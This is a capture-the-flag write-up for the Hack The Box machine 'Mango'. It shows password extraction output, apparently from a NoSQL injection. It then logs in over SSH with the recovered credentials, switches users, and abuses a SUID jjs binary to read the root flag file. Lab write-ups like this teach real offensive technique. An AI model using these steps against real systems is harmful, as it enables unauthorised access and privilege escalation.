No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
...
So we found two password, but we have to correlate the password to the correct user. Using the login interface we will build the right couples username:password
The found credentials are, then: admin:t9KcS3>!0B#2 mango:h3mXK8RhU~f{]f5H
we found, previously, that there is a SSH server running on this host, so I will try the credentials against the SSH server. The admin credential does not work, the mango one works!
kali@kali:~$ ssh admin@staging-order.mango.htb
admin@staging-order.mango.htb's password:
Permission denied, please try again.
admin@staging-order.mango.htb's password:
kali@kali:~$ ssh mango@staging-order.mango.htb
mango@staging-order.mango.htb's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Mar 13 15:22:53 UTC 2020
System load: 0.01 Processes: 113
Usage of /: 26.3% of 19.56GB Users logged in: 1
Memory usage: 31% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Mar 13 13:30:20 2020 from 10.10.14.54
mango@mango:~$
Doing the enumeration I found the user flag in the user admin home. As the mango user I can't read it. Reading the ssd_config file I found the admin user is not allowed to connect using SSH, so it is possible the password is good for the user, so I try to switch to the admin user, with the previously found password.
mango@mango:/home/admin$ cat /etc/ssh/sshd_config |grep Users
AllowUsers mango root
mango@mango:/home/admin$ su - admin
Password:
$ bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@mango:/home/admin$
admin@mango:/home/admin$ cat user.txt
79bf31c6c6eb38a8567832f7f8b47e92
So the user flag is 79bf31c6c6eb38a8567832f7f8b47e92
Checking for some vectors for privilege escalation I found a SUID file:
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
I was not able to obtain a root shell, anyway I got the root token
mango@mango:~$ su - admin
Password:
$
$
$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs> > >
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a8ef79a7a2fbb01ea81688424e9ab15
jjs> $
the root token is 8a8ef79a7a2fbb01ea81688424e9ab15